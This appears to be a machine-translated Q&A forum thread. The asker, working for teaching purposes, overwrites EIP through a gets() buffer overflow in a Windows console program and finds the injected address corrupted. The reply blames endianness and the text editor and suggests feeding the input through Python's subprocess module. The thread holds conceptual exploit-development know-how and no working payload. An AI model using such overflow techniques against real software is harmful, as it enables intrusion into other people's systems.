Windows console application with get () ROP function
I am trying (for teaching purposes) to use a get () function on a function using a reverse programming (ROP) method. The target program is a Windows console application that at some point asks for some input and then uses gets () to store the input in an array up to 80 characters long.
I created a file that contains 80 'a' characters at the beginning + some extra characters + 0x5da06c48 address to overwrite the old EIP pointer.
I open the file in a text editor and copy the content of the content to the console as input. I used IDA Pro (or OllyDbg) to set a breakpoint right after the gets () function returns, and noticed that the address was corrupted - it was set to 0x3fa03f48 (two 3f replacements).
I also tried other addresses - some of them work well, but in most cases the address is damaged (sometimes characters are missing or replaced, sometimes they are truncated).
How to solve this problem? Any suggestion would be much appreciated!
source to share
First of all, keep track of the Endianness of your platform. If you think your bits are in the correct order, but you are still receiving incorrect input, it is possible that your shell / text editor is not binary. You are better off writing an exploit for this flaw in a scripting language like Python using the Subprocess library , which allows you to write data directly to an arbitrary stdin pipe of a process.
source to share